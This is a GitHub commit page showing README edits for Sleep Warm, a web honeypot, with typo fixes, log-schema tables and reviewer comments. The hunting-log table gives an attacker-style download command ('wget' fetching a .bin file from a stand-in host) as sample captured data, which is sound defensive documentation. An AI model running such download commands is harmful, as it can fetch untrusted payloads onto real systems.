This repository has been archived by the owner on Dec 27, 2023. It is now read-only.

Merge pull request #19 from ninoseki/update-doc
doc: fix typos & update the log schema
ninoseki authored Oct 3, 2018
2 parents 545e241 + afbdfac commit fa01365
Showing 1 changed file with 17 additions and 18 deletions.
35 changes: 17 additions & 18 deletions README.md
Expand Up @@ -9,7 +9,7 @@ A web-based low-interaction honeypot build on [Rack](https://github.com/rack/rac
## Concepts

- Easy to install.
- One-click deploy to Heroku or just execute [Itamae](http://itamae.kitchen/) scripts.
- One-click deployment to Heroku or just execute [Itamae](http://itamae.kitchen/) scripts.
- Easy to customize.
- Matching rules and default responses are customizable via editing YAML files.
- Well tested.
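Review bot: the reworded bullet still mixes a noun phrase with an imperative ("One-click deployment to Heroku or just execute [Itamae] scripts"); make the two halves parallel, e.g. "One-click deployment to Heroku, or deployment via [Itamae](http://itamae.kitchen/) scripts." While touching this paragraph, the unchanged context line at the top of the hunk still reads "honeypot build on [Rack]", which should be "built on".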
Expand Down Expand Up @@ -48,7 +48,7 @@ $ itamae ssh -h HOST -u USER cookbooks/sleep_warm/ufw.rb

And then the honeypot works as `sleep-warm.service` on `80/tcp` and `9292/tcp`.

After the deployment, please set you Elasticsearch settings in `/opt/sleep-warm/.env` and restart the service. (By default, Sleep Warm outputs Logstash log to STDOUT.)
After the deployment, please set your Elasticsearch settings in `/opt/sleep-warm/.env` and restart the service. (By default, Sleep Warm outputs Logstash log to STDOUT.)

```
# Do not change this
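Review bot: "outputs Logstash log to STDOUT" is still ungrammatical after the "you" → "your" fix; "outputs Logstash-formatted logs to STDOUT" says what is meant. Since `/opt/sleep-warm/.env` is where the Elasticsearch settings (including the `LOGSTASH_TOKEN` shown in the next hunk's context) live, it is worth one sentence here reminding operators to keep that file readable only by the service user and out of version control, as it holds a credential.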
Expand All @@ -63,7 +63,7 @@ LOGSTASH_TOKEN=YOUR_TOKEN

## Matching rules

Matching rules are stored in `/opt/sleep-warm/app/rules` as YAML files.
The matching rules are stored in `/opt/sleep-warm/app/rules` as YAML files.

The rule file format:

Expand All @@ -86,34 +86,33 @@ response:
body: hoge
```
The rule mataches a request which HTTP method is `GET` and request URI contains `hoge` and header contains `hoge` and body contains `hoge`.
The rule matches a request which HTTP method is `GET` and request URI contains `hoge` and header contains `hoge` and body contains `hoge`.

## Log

Sleep Warm outputs 2 types of logs.

### Access log

- Access log to the honeypot.
- Access log of the honeypot.

| key | desc. | e.g. | type |
|:-------------|:----------------------------|:----------------------------------------------------------------|:-------|
| client_ip | Client IP | `10.0.2.2` | string |
| hostname | Hostname | `localhost:9292` | string |
| method | HTTP method | `GET` | string |
| uri | Request URI | `http://localhost:9292` | string |
| http_version | HTTP version | `HTTP/1.1` | string |
| status | Status code | `200` | number |
| rule_id | Matched rule id | `1001` (if there is no matching results, it will be set as `0`) | number |
| all | Base64 encoded HTTP request | - | string |
| key | desc. | e.g. | type |
|:-------------|:----------------------------|:----------------------------------------------------------------------------------------------------------------------------|:-------|
| client_ip | Client IP | `10.0.2.2` | string |
| hostname | Hostname | `localhost:9292` | string |
| method | HTTP method | `GET` | string |
| uri | Request URI | `http://localhost:9292` | string |
| http_version | HTTP version | `HTTP/1.1` | string |
| status | Status code | `200` | number |
| rule_id | Matched rule id | `1001` (if there is no matching results, it will be set as `0`) | number |
| user_agent | User agent | `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36` | string |
| all | Base64 encoded HTTP request | - | string |

### Hunting log

- Hunting log to the honeypot.
- Hunting log of the honeypot.

| key | desc. | e.g. | type |
|:----------|:-----------------------------------------|:-----------------------------------|:-------|
| client_ip | Client IP | `10.0.2.2` | string |
| commands | Commands which try to download something | `wget http://example.com/hoge.bin` | string |
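Review bot: the typo fix leaves a grammatical error in the same sentence: "a request which HTTP method is `GET`" should be "a request whose HTTP method is `GET`", and the four conditions read better as a list, e.g. "The rule matches a request whose HTTP method is `GET`, whose request URI contains `hoge`, whose headers contain `hoge`, and whose body contains `hoge`." In the access-log table, the new `user_agent` row is a welcome addition, but the `all` row's "e.g." cell is still `-`; a short note that it is the full raw request, base64-encoded, would make the schema self-describing for anyone building Elasticsearch queries on it.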

